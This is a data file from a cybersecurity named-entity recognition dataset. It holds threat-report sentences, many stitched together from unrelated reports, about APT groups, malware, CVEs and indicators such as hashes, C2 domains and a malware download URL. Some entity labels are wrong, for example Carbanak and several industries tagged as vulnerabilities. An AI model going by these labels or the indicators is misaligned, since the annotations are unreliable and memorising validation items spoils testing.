{"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": {"Indicator: IP": [[148, 150]], "Malware: malware will": [[180, 192]]}, "info": {"id": "cyberner_stix_valid_000637", "source": "cyberner_stix_valid"}}
{"text": "In the decrypted shellcode , we also observed content and configuration related to Poison Ivy .", "spans": {}, "info": {"id": "cyberner_stix_valid_000638", "source": "cyberner_stix_valid"}}
{"text": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion .", "spans": {"Malware: TRITON": [[80, 86]]}, "info": {"id": "cyberner_stix_valid_000639", "source": "cyberner_stix_valid"}}
{"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Port 80 and 443 are the default ports for HTTP and HTTPS traffic . It crafts configurable IEC-104 Application Service Data Unit ( ASDU ) messages , to change the state of RTU Information Object Addresses ( IOAs ) to ON or OFF .", "spans": {}, "info": {"id": "cyberner_stix_valid_000640", "source": "cyberner_stix_valid"}}
{"text": "This alert identifies IP S-PROT addresses linked to systems infected with DeltaCharlie malware and provides descriptions of the malware and associated malware signatures .", "spans": {"Malware: DeltaCharlie": [[74, 86]]}, "info": {"id": "cyberner_stix_valid_000641", "source": "cyberner_stix_valid"}}
{"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text messages it spreads . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . In November 2019 , ESET ’s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"Organization: Wikileaks": [[320, 329]], "Organization: ESET": [[422, 426]], "Malware: Winnti": [[583, 589]], "Organization: AshleyMadisonSucks.com": [[690, 712]], "Organization: Ashley Madison": [[743, 757]]}, "info": {"id": "cyberner_stix_valid_000642", "source": "cyberner_stix_valid"}}
{"text": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it . The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"Malware: Trojan": [[171, 177]]}, "info": {"id": "cyberner_stix_valid_000643", "source": "cyberner_stix_valid"}}
{"text": "In July , the DCCC announced that it was investigating an ongoing “ cybersecurity incident ” that the FBI believed was linked to the compromise of the DNC .", "spans": {"Organization: DCCC": [[14, 18]], "Organization: FBI": [[102, 105]], "Organization: DNC": [[151, 154]]}, "info": {"id": "cyberner_stix_valid_000644", "source": "cyberner_stix_valid"}}
{"text": "The phones are sold at Best Buy and Amazon.com , among other retail outlets . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . Therefore , once a user executes the attachment and sees the password dialog on SFX , the downloader dropped by the malicious code starts working even if the user chooses the Cancel on the password window .", "spans": {"Organization: Best Buy": [[23, 31]], "Organization: Amazon.com": [[36, 46]]}, "info": {"id": "cyberner_stix_valid_000645", "source": "cyberner_stix_valid"}}
{"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime .", "spans": {"Malware: Backdoor.APT.Pgift": [[54, 72]], "Organization: Group-IB": [[172, 180]]}, "info": {"id": "cyberner_stix_valid_000646", "source": "cyberner_stix_valid"}}
{"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Rolles said this was to handle another obfuscation called “ Odd Stack Manipulations ” Russia has historically used self - proclaimed hacktivist groups as a means to obfuscate its role in operations against Western nations and it is plausible that Zarya or various pro - Russia hacktivists that have risen to prominence since Russia ’s invasion of Ukraine may either be cooperating or coordinating with , or a front for , the Russian security intelligence services .", "spans": {"Vulnerability: Carbanak": [[99, 107]], "Organization: banks": [[167, 172]], "Organization: payment systems": [[179, 194]], "Organization: Western nations": [[403, 418]], "Organization: Russian security intelligence services": [[622, 660]]}, "info": {"id": "cyberner_stix_valid_000647", "source": "cyberner_stix_valid"}}
{"text": "The group also does not make special effort to cultivate victims prior to an attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000648", "source": "cyberner_stix_valid"}}
{"text": "May 2018 to April 2019 : This is the actual mature stage of “ Agent Smith ” campaign . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks . Behavioral blocking and containment capabilities are especially effective in defeating Dexphot ’s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks . If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": {"Malware: Agent Smith": [[62, 73]], "Organization: IT departments": [[107, 121]], "Malware: Dexphot": [[350, 357]], "System: Exchange Server": [[542, 557]]}, "info": {"id": "cyberner_stix_valid_000649", "source": "cyberner_stix_valid"}}
{"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"Vulnerability: CVE-2017-0144": [[100, 113]], "Vulnerability: CVE-2017-0145": [[118, 131]], "Vulnerability: zero-day": [[365, 373]]}, "info": {"id": "cyberner_stix_valid_000650", "source": "cyberner_stix_valid"}}
{"text": "It communicates with the C2 server using HTTP POST requests .", "spans": {}, "info": {"id": "cyberner_stix_valid_000651", "source": "cyberner_stix_valid"}}
{"text": "In the past few years , LEAD ’s victims have included :", "spans": {}, "info": {"id": "cyberner_stix_valid_000652", "source": "cyberner_stix_valid"}}
{"text": "Password_Policy.xlsm : 03ea9457bf71d51d8109e737158be888 .", "spans": {"Indicator: Password_Policy.xlsm": [[0, 20]], "Indicator: 03ea9457bf71d51d8109e737158be888": [[23, 55]]}, "info": {"id": "cyberner_stix_valid_000653", "source": "cyberner_stix_valid"}}
{"text": "The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"Organization: military": [[34, 42]], "Organization: government": [[46, 56]], "Organization: higher education": [[78, 94]], "Organization: high tech companies": [[99, 118]], "Malware: Infy": [[267, 271]]}, "info": {"id": "cyberner_stix_valid_000654", "source": "cyberner_stix_valid"}}
{"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather . The first known Suckfly campaign began in April of 2014 . The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad . Attackers may perform seemingly authorized actions but left unchecked , victims may be met with an unwelcome surprise .", "spans": {"System: AccuWeather": [[333, 344]], "Organization: Syrian Army": [[457, 468]], "Organization: victims": [[601, 608]]}, "info": {"id": "cyberner_stix_valid_000655", "source": "cyberner_stix_valid"}}
{"text": "As XENOTIME matures , it is less likely that the group will make this mistake in the future .", "spans": {}, "info": {"id": "cyberner_stix_valid_000656", "source": "cyberner_stix_valid"}}
{"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . In another example , Last , it sends a single “ C_CS_NA_1 – clock synchronization command ” to the target station , which synchronizes the remote station time clock with the time clock for the device issuing the commands .", "spans": {"System: Google Play": [[63, 74]], "Organization: government agencies": [[236, 255]], "Organization: biotechnology": [[276, 289]], "Organization: electronics manufacturing": [[292, 317]], "Organization: industrial chemistry": [[324, 344]]}, "info": {"id": "cyberner_stix_valid_000657", "source": "cyberner_stix_valid"}}
{"text": "Alert : HIDDEN COBRA - North Korea 's DDoS Botnet I-TOOL Infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000658", "source": "cyberner_stix_valid"}}
{"text": "What is the scope of Chrysaor ? Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability . That attack was attributed to perpetrators Kaspersky called the Winnti Group . In reality he stated he simply loved to rob banks .", "spans": {"Malware: Chrysaor": [[21, 29]], "Organization: Kaspersky": [[174, 183]]}, "info": {"id": "cyberner_stix_valid_000659", "source": "cyberner_stix_valid"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": {"Vulnerability: zero-day exploits": [[143, 160]], "Vulnerability: exploit": [[281, 288]], "Vulnerability: CVE-2017-1182": [[289, 302]], "Indicator: Microsoft Equation Editor": [[320, 345]], "Indicator: 'EQNEDT32.exe'": [[348, 362]]}, "info": {"id": "cyberner_stix_valid_000660", "source": "cyberner_stix_valid"}}
{"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 . This binary downloads a new file on Google Drive . We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"Malware: RuMMS": [[11, 16]]}, "info": {"id": "cyberner_stix_valid_000661", "source": "cyberner_stix_valid"}}
{"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"Indicator: files": [[167, 172]], "Vulnerability: exploit": [[173, 180]], "Vulnerability: CVE-2012-0158": [[229, 242]]}, "info": {"id": "cyberner_stix_valid_000662", "source": "cyberner_stix_valid"}}
{"text": "I didn’t just revive the C2 but also added more advanced functionality which will be released as separate tool soon .", "spans": {}, "info": {"id": "cyberner_stix_valid_000663", "source": "cyberner_stix_valid"}}
{"text": "This is not a new tactic but may be more effective at evading detection as the external hosts involved are a legitimate email service provider .", "spans": {}, "info": {"id": "cyberner_stix_valid_000664", "source": "cyberner_stix_valid"}}
{"text": "The leaked NSA documents and tools published in recent months by the mysterious Shadow Brokers group have provided rare insight into the clandestine digital espionage operations pursued by the spy agency over the past few years , including information on operations aimed at Iran and Russia . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"Organization: NSA": [[11, 14]], "Organization: spy agency": [[193, 203]], "Organization: ethnic minorities": [[343, 360]], "Organization: religious groups": [[365, 381]]}, "info": {"id": "cyberner_stix_valid_000665", "source": "cyberner_stix_valid"}}
{"text": "] today : Som Tum We also identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware . it reports to was created on August 10 , 2011 . The malware ID seems to be a campaign code with a different IP address for each attack . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"Malware: DenDroid": [[123, 131], [168, 176]], "System: Android": [[136, 143]], "Vulnerability: a gap in the implementation of CSP , and even for sites that do use it correctly": [[363, 443]]}, "info": {"id": "cyberner_stix_valid_000666", "source": "cyberner_stix_valid"}}
{"text": "The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 . Naikon is a threat group that has focused on targets around the South China Sea .", "spans": {}, "info": {"id": "cyberner_stix_valid_000667", "source": "cyberner_stix_valid"}}
{"text": "If this execution is successful , it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from http://45.76.128.165:4443/0w0O6 .", "spans": {"Indicator: http://45.76.128.165:4443/0w0O6": [[157, 188]]}, "info": {"id": "cyberner_stix_valid_000668", "source": "cyberner_stix_valid"}}
{"text": "If certain security products are installed , the backdoor does not carry out its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000669", "source": "cyberner_stix_valid"}}
{"text": "] 160 [ . Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document . This first step provides a SSRF equivalent to the technique used in ProxyNotShell exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000670", "source": "cyberner_stix_valid"}}
{"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 . We uncovered a substantial amount of APT1 ’s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": {}, "info": {"id": "cyberner_stix_valid_000671", "source": "cyberner_stix_valid"}}
{"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": {"Vulnerability: zero-day vulnerability": [[18, 40]], "Vulnerability: CVE-2015-2545": [[51, 64]]}, "info": {"id": "cyberner_stix_valid_000672", "source": "cyberner_stix_valid"}}
{"text": "Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": {"Vulnerability: CVE-2018-8414": [[74, 87]], "Vulnerability: CVE-2014-0515": [[279, 292]], "Vulnerability: exploit": [[305, 312]], "Organization: Cisco TRAC": [[331, 341]]}, "info": {"id": "cyberner_stix_valid_000673", "source": "cyberner_stix_valid"}}
{"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications — that ’ s the reason why once one of them get into the system , in a few minutes there are all the others . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": {"Vulnerability: CVE-2012-0158": [[290, 303]], "Organization: Unit 42": [[354, 361]], "Organization: financial institutions": [[410, 432]], "Organization: technology organizations": [[437, 461]]}, "info": {"id": "cyberner_stix_valid_000674", "source": "cyberner_stix_valid"}}
{"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime . The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": {"Malware: Zen": [[147, 150]], "Organization: Group-IB": [[153, 161]], "Organization: Mandiant": [[529, 537]]}, "info": {"id": "cyberner_stix_valid_000675", "source": "cyberner_stix_valid"}}
{"text": "Roaming Mantis is believed to be a Chinese threat actor group first discovered in April 2018 that has continuously evolved . We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . RoyalDNS - required APT15 .", "spans": {"Organization: Roaming Mantis": [[0, 14]], "Organization: We": [[125, 127]], "Malware: RoyalDNS": [[306, 314]]}, "info": {"id": "cyberner_stix_valid_000676", "source": "cyberner_stix_valid"}}
{"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": {"Malware: Margarita": [[33, 42]], "Organization: Arab Emirates": [[248, 261]]}, "info": {"id": "cyberner_stix_valid_000677", "source": "cyberner_stix_valid"}}
{"text": "A new campaign is up and running using newly improved , significantly more powerful malware as compared to previous versions . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": {"Malware: malware": [[133, 140]], "Organization: government": [[217, 227]], "Organization: private": [[232, 239]], "Organization: organizations": [[240, 253]], "Organization: Symantec": [[428, 436]], "Organization: Trend Micro": [[441, 452]]}, "info": {"id": "cyberner_stix_valid_000678", "source": "cyberner_stix_valid"}}
{"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan . The vast majority of that was junk code . Two days after the OT event , Sandworm deployed a new variant of CADDYWIPER in the victim ’s IT environment to cause further disruption and potentially to remove forensic artifacts .", "spans": {"Organization: Instagram": [[10, 19]], "Organization: Tumblr": [[92, 98]], "Malware: CADDYWIPER": [[579, 589]], "System: victim ’s IT environment": [[597, 621]]}, "info": {"id": "cyberner_stix_valid_000679", "source": "cyberner_stix_valid"}}
{"text": "Office 365 Advanced Threat Protection secures mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries . OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"System: Office 365 Advanced Threat Protection": [[0, 37]], "Vulnerability: zero-day exploits": [[86, 103]], "Malware: FinFisher": [[128, 137]], "Organization: Microsoft": [[470, 479]]}, "info": {"id": "cyberner_stix_valid_000680", "source": "cyberner_stix_valid"}}
{"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"Vulnerability: Heartbleed vulnerability": [[36, 60]], "Vulnerability: exploit": [[169, 176]], "Vulnerability: CVE-2016-4117": [[183, 196]]}, "info": {"id": "cyberner_stix_valid_000681", "source": "cyberner_stix_valid"}}
{"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations . As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": {"System: Android": [[226, 233]], "Organization: Recorded Future": [[251, 266]], "System: Windows": [[432, 439]], "Indicator: distillist.lnk": [[469, 483]]}, "info": {"id": "cyberner_stix_valid_000682", "source": "cyberner_stix_valid"}}
{"text": "Machine learning in Windows Defender ATP further flags suspicious behaviors observed related to the manipulation of legitimate Windows binaries . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag . “ Who or what is asdfdfsda@asdf.com ? , ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"System: Windows Defender ATP": [[20, 40]], "System: Windows": [[127, 134]], "Malware: Zawgyi_Keyboard_L.zip": [[170, 191]], "Malware: setup.exe": [[215, 224]], "Malware: wincex.dll": [[293, 303]], "Organization: asdfdfsda@asdf.com": [[570, 588]], "Organization: Biderman": [[595, 603]]}, "info": {"id": "cyberner_stix_valid_000683", "source": "cyberner_stix_valid"}}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"Malware: malicious documents": [[4, 23]], "Organization: Pakistan Army": [[126, 139]], "Indicator: documents": [[327, 336]], "Vulnerability: exploit": [[358, 365]], "Malware: Trojan": [[375, 381]]}, "info": {"id": "cyberner_stix_valid_000684", "source": "cyberner_stix_valid"}}
{"text": "Sofacy Uses DealersChoice to Target European Government Agency .", "spans": {}, "info": {"id": "cyberner_stix_valid_000685", "source": "cyberner_stix_valid"}}
{"text": "Cobalt Strike C2 server : svchosts.com , svrhosts.com .", "spans": {"Indicator: svchosts.com": [[26, 38]], "Indicator: svrhosts.com": [[41, 53]]}, "info": {"id": "cyberner_stix_valid_000686", "source": "cyberner_stix_valid"}}
{"text": "The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 .", "spans": {"Vulnerability: EternalBlue exploit": [[4, 23]], "Malware: WhiteBear": [[169, 178]], "Malware: Skipper Turla": [[224, 237], [310, 323]], "Malware: White Atlas": [[330, 341]]}, "info": {"id": "cyberner_stix_valid_000687", "source": "cyberner_stix_valid"}}
{"text": "If all conditions are met , “ Agent Smith ” tries to infect the application . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members . The installer uses two URLs to download malicious payloads . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"Malware: Agent Smith": [[30, 41]]}, "info": {"id": "cyberner_stix_valid_000688", "source": "cyberner_stix_valid"}}
{"text": "We believe Suckfly specifically developed the back door for use in cyberespionage campaigns .", "spans": {}, "info": {"id": "cyberner_stix_valid_000689", "source": "cyberner_stix_valid"}}
{"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument .", "spans": {"Organization: Users": [[0, 5]], "Indicator: regsvr32.exe": [[106, 118]], "System: Windows": [[156, 163]], "Indicator: SCT file": [[223, 231]]}, "info": {"id": "cyberner_stix_valid_000690", "source": "cyberner_stix_valid"}}
{"text": "It does so for each and every app on the device as long as the package names are on its prey list . There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog . The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat authors began to use random strings . Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as “ HAFNIUM ” , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": {"Organization: Microsoft": [[480, 489]], "Organization: US - based defense companies": [[642, 670]], "Organization: law firms": [[673, 682]], "Organization: infectious disease researchers": [[685, 715]], "Organization: think tanks": [[722, 733]]}, "info": {"id": "cyberner_stix_valid_000691", "source": "cyberner_stix_valid"}}
{"text": "Artifact #2 was recovered from the Admin Controller operated by Die Linke .", "spans": {}, "info": {"id": "cyberner_stix_valid_000692", "source": "cyberner_stix_valid"}}
{"text": "send funds via a wire transfer ) . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": {"Organization: we": [[56, 58]], "Organization: Proofpoint": [[70, 80]]}, "info": {"id": "cyberner_stix_valid_000693", "source": "cyberner_stix_valid"}}
{"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": {"Malware: OwaAuth web shell": [[169, 186]]}, "info": {"id": "cyberner_stix_valid_000694", "source": "cyberner_stix_valid"}}
{"text": "The IPacket , Serialization and Encryption framework code is shared between the client and the server , therefore we can use it with Reflection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000695", "source": "cyberner_stix_valid"}}
{"text": "Similarly , some of the hardcoded values that had remained unaltered in CosmicDuke samples for many years had been changed .", "spans": {"Malware: CosmicDuke": [[72, 82]]}, "info": {"id": "cyberner_stix_valid_000696", "source": "cyberner_stix_valid"}}
{"text": "However , the group exercises restraint and defensive evasion tactics to minimize opportunities for network defenders to detect or investigate its activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000697", "source": "cyberner_stix_valid"}}
{"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “ real ” malware to run .", "spans": {}, "info": {"id": "cyberner_stix_valid_000698", "source": "cyberner_stix_valid"}}
{"text": "In environments with a high risk of interception or intrusion , organizations should consider supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens .", "spans": {}, "info": {"id": "cyberner_stix_valid_000699", "source": "cyberner_stix_valid"}}
{"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": {"Organization: CTU": [[190, 193]]}, "info": {"id": "cyberner_stix_valid_000700", "source": "cyberner_stix_valid"}}
{"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target . For example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": {"System: Android": [[43, 50], [175, 182], [292, 299]], "Organization: eSurv": [[87, 92]], "Malware: backdoor": [[477, 485]], "Organization: the U.S.": [[628, 636]], "Organization: South Korea": [[639, 650]], "Organization: Taiwan": [[653, 659]], "Organization: U.K.": [[666, 670]], "Organization: India": [[675, 680]], "Vulnerability: business verticals": [[696, 714]], "Vulnerability: manufacturing": [[727, 740]], "Vulnerability: wealth management": [[743, 760]], "Vulnerability: insurance providers": [[763, 782]], "Vulnerability: pharmaceuticals and financial management consulting companies": [[785, 846]]}, "info": {"id": "cyberner_stix_valid_000701", "source": "cyberner_stix_valid"}}
{"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique called Heaven ’ s Gate . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . The payload is encoded inside a separate .png file using a technique called steganography . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": {"System: Virtual Private Server ( VPS ) hosting service": [[437, 483]]}, "info": {"id": "cyberner_stix_valid_000702", "source": "cyberner_stix_valid"}}
{"text": "HAMMERDUKE : First known activity January 2015 , Most recent known activity Summer 2015 , Other names HAMMERTOSS , Netduke , C&C communication methods HTTP(S) , Twitter , Known toolset components Backdoor .", "spans": {"Malware: HAMMERDUKE": [[0, 10]], "Malware: HAMMERTOSS": [[102, 112]], "Malware: Netduke": [[115, 122]]}, "info": {"id": "cyberner_stix_valid_000703", "source": "cyberner_stix_valid"}}
{"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions . Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . All these information are automatically loaded by the RMS executable and firstly stored in the registry key “ HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000704", "source": "cyberner_stix_valid"}}
{"text": "The said technique brings the advantage of avoiding auto-start extensibility points ( ASEP ) scanners and programs that checks for binaries installed as service ( for the latter , the service chosen by FinFisher will show up as a clean Windows signed binary ) . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process’s text section . A Systemd service unit allows for a program to be run under certain conditions , and in this case , it was used to execute the GOGETTER binary on reboot .", "spans": {"Malware: FinFisher": [[202, 211]], "System: Windows": [[236, 243]], "Organization: social media": [[284, 296]], "Malware: GOGETTER binary on reboot": [[709, 734]]}, "info": {"id": "cyberner_stix_valid_000705", "source": "cyberner_stix_valid"}}
{"text": "All data is transmitted in JSON format ( after decryption ) . TG-3390 actors have used Java exploits in their SWCs . This allows the malicious activity to evade detection . The victims have been in the Americas , EMEA , and APJ as of writing .", "spans": {"Vulnerability: Java exploits": [[87, 100]]}, "info": {"id": "cyberner_stix_valid_000706", "source": "cyberner_stix_valid"}}
